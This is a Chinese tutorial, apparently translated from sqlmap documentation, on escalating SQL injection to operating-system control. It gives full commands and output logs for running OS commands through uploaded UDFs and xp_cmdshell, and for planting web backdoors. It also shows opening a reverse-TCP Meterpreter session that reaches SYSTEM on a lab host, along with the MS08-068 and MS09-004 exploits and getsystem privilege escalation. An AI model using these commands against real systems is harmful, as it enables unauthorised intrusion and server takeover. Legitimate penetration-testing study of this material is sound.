sqlmap控制任意操作系统

一、 执行任意操作系统命令

参数和开关 –os-cmd和–os-shell

当后端数据库管理系统或者是MySQL和PostgreSQL或Microsoft SQL Server，并且当前用户具有相关权限时,sqlmap可以在服务器的底层操作系统上执行任意的命令。

当目标数据库是MySQL或者PostgreSQL时，sqlmap会上传包含用户自定义函数sys_exec()和sys_eval()的共享库（二进制文件），然后在数据库上创建并调用其中一个函数来执行命令（具体调用哪个会询问你的意见）。在Microsoft SQL Server上，sqlmap会利用xp_cmdshell存储过程：如果它被禁用（默认情况下，Microsoft SQL Server> = 2005），sqlmap将重新启用它; 如果它不存在，sqlmap会从头开始创建它。

当用户需要看到标准输出时，sqlmap使用一个可列举的注入技术（盲注，带内或基于错误的注入）来执行命令。反之，则使用堆查询注入技术来执行命令。

这些技术可详细参考 Advanced SQL injection to operating system full control

针对PostgreSQL目标的示例：

python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --os-cmd id -v 1

输出：

[...]
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:12] [INFO] the back-end DBMS operating system is Linux
[hh:mm:12] [INFO] testing if current user is DBA
[hh:mm:12] [INFO] detecting back-end DBMS version from its banner
[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist
[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file
[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:    'uid=104(postgres) gid=106(postgres) groups=106(post
gres)'

[hh:mm:19] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n] y
do you want to remove UDF 'sys_exec'? [Y/n] y
[hh:mm:23] [INFO] database management system cleanup finished
[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file sys
tem can only be deleted manually

你也可以使用参数–os-shell来模拟一个真正的shell，和–sql-shell一样这个shell也可以用Tab键补全，支持历史记录。

如果Web应用程序中不支持堆查询（例如PHP或ASP，后端数据库管理系统为MySQL）且DBMS是MySQL，slqmap会利用SELECT子语句INTO OUTFILE在服务器可写目录常见一个web后门，通过这种方式来执行命令，当然前提是数据库和web应用程序在同一台服务器上。sqlmap还允许用户提供用逗号分割的可写目录的路径。此外，sqlmap有以下语言的经过测试的Web后门程序：

• ASP
• ASP.NET
• JSP
• PHP

二、Meterpreter配合使用

参数和开关 –os-pwn，–os-smbrelay，–os-bof，–priv-esc，–msf-path和–tmp-path

当后端数据库管理系统是MySQL，PostgreSQL或Microsoft SQL Server，并且当前用户有相应权限时，sqlmap可以在攻击者机器和数据库所在服务器之间建立带外状态TCP连接，根据用户的选择，此连接可以是交互式命令shell，Meterpreter会话或图形用户界面（VNC）会话。

sqlmap依靠Metasploit来创建shellcode并使用4种方式来执行它。这些技术是：

• 通过用户自定义的sys_bineval()函数在内存中执行Metasplit的shellcode，支持MySQL和PostgreSQL数据库。参数：--os-pwn
• 通过用户自定义的函数(MySQL和PostgreSQL的sys_exec()函数，Microsoft SQL Server的xp_cmdshell()函数)来上传并执行 Metasploit的stand-alone payload stager。参数：--os-pwn
• 通过SMB攻击(MS08-068)来执行Metasploit的shellcode，要求sqlmap获取到的权限足够高（Linux/Unix的uid=0，Windows是Administrator）。参数：--os-smbrelay
• 通过Microsoft SQL Server 2000和2005的sp_replwritetovarbin存储过程(MS09-004)溢出漏洞，在内存中执行Metasploit的payload，sqlmap有自己的漏洞利用自动DEP内存保护绕过来触发漏洞，但它依赖于Metasploit来生成shellcode，以便在成功利用后执行。参数：--os-bof

这些技术可详细参考 Advanced SQL injection to operating system full control

针对MySQL目标的示例：

python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn --msf-path /software/metasploit

结果：

[...]
[hh:mm:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:31] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 
[hh:mm:32] [INFO] testing if current user is DBA
[hh:mm:32] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 
[hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist
[hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:33] [INFO] detecting back-end DBMS version from its banner
[hh:mm:33] [INFO] retrieving MySQL base directory absolute path
[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database und
erlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
> 
[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode 
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on 
all ports 
between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
> 
which is the local address? [192.168.136.1] 
which local port number do you want to use? [60641] 
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 
[hh:mm:40] [INFO] creation in progress ... done
[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, p
lease wait..

                                _
                                | |      o
_  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
|  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                        /|
                        \|


    =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 674 exploits - 351 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
    =[ svn r12272 updated 4 days ago (2011.04.07)

PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 60641
LHOST => 192.168.136.1
[*] Started reverse handler on 192.168.136.1:60641 
[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_b
ineval', please wait..
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) a
t Mon Apr 11 hh:mm:52 +0100 2011

meterpreter > Loading extension espia...success.
meterpreter > Loading extension incognito...success.
meterpreter > [-] The 'priv' extension has already been loaded.
meterpreter > Loading extension sniffer...success.
meterpreter > System Language : en_US
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Computer        : W2K3R2
Architecture    : x86
Meterpreter     : x86/win32
meterpreter > Server username: NT AUTHORITY\SYSTEM
meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0



Intel(R) PRO/1000 MT Network Connection
Hardware MAC: 00:0c:29:fc:79:39
IP Address  : 192.168.136.129
Netmask     : 255.255.255.0


meterpreter > exit

[*] Meterpreter session 1 closed.  Reason: User exit

在windows系统中MySQL默认以SYSTEM身份运行，但PostgreSQL无论是在Windows还是在Linux中都以低权限的用户postgres运行。SQL Server 2000默认以SYSTEM身份运行，但SQL Server 2005到2008大多数时间以NETWORK SERVICE身份运行，少数时候以LOCAL SERVICE身份运行。

可以使用参数--priv-esc来运行Metasploit的getsystem command命令来提升权限。